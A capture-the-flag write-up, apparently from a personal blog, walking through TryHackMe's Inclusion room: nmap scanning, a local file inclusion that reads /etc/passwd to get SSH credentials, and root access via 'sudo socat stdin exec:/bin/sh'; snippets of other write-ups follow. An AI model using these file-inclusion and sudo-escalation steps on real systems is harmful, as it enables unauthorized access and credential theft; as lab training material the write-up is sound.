Inclusion - TryHackMe

-
thm


What we can learn from this machine :

  • enumerations
  • local-file-inclusion (LFI)
  • socat
# Nmap 7.91 scan initiated Fri Jun 11 15:50:08 2021 as: nmap -sC -sV -sT -A -oN nmap/nmap-output 10.10.65.107
Nmap scan report for 10.10.65.107
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 11 15:50:44 2021 -- 1 IP address (1 host up) scanned in 36.00 seconds

Looks like we got the port 80 http website named My blog and port 22 ssh.

Let’s look into that blog posts. After we change into that post. You can see our url change into the article?name=hacking looks like file inclusion.

Documentation abot LFI : https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/

Let’s try to get /etc/passwd list from this.

Looks like we got our username:password let’s try to log into our user through ssh.

[visith@parrot][~/CTF/thm/Inclusion]
└──╼ $ssh falconfeast@10.10.65.107
The authenticity of host '10.10.65.107 (10.10.65.107)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.65.107' (ECDSA) to the list of known hosts.
falconfeast@10.10.65.107's password: 
falconfeast@inclusion:~$ ls
articles  user.txt
falconfeast@inclusion:~$ cat user.txt
60989655118397345799

We got the user flag let’s get the root privilege. Before running any of the enumeration scripts. Let’s look what we can run.

falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

socat looks like we can run socat without passwd. Let’s visit to GTFObins and grab a command.

https://gtfobins.github.io/gtfobins/socat/#sudo

falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
whoami
root
cd /root
ls
root.txt

Thx for reading !!
Have a nice day

Orginal write-up

Popular posts from this blog

Mustacchio - TryHackMe

-
Image
thm What we can learn from this machine : XXE injection Enumerations SUID exploit let’s start with a nmap scan. normal nmap scan found port 80 webserver called Mustacchio and port 22 ssh open running ubuntu. I try to running a full nmap scan for see more ports are open above the port 1000. # Nmap 7.91 scan initiated Sat Jun 12 14:57:25 2021 as: nmap -sC -sV -p- -oN scans/nmap-allports 10.10.236.36 Nmap scan report for 10.10.236.36 Host is up (0.15s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-t
Read more

Tech_Supp0rt: 1 - TryHackMe

-
Image
Welcome file Welcome to another CTF-writeup !! Tech_support:1 by vikaran. What we can learn from this machine. nmap scan , smbmap etc. (enumeration skills) subrion cms 4.2.1 RCE iconv sudo permission to overwritten files and read the files Let’s start with enumeration. First with nmap to see what port we have in the box. Nmap scan ┌── ( defalt@kali ) - [ ~/Documents/tryhackme/Tech_Supp0rt:1 ] └─$ nmap -sC -sV 10.10.168.200 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-15 21:29 PDT Nmap scan report for 10.10.168.20 Host is up ( 0.37s latency ) . Not shown: 996 closed tcp ports ( conn-refused ) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 ( RSA ) | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c ( ECDSA ) | _ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c ( ED25519 ) 80/tcp open http Apache ht
Read more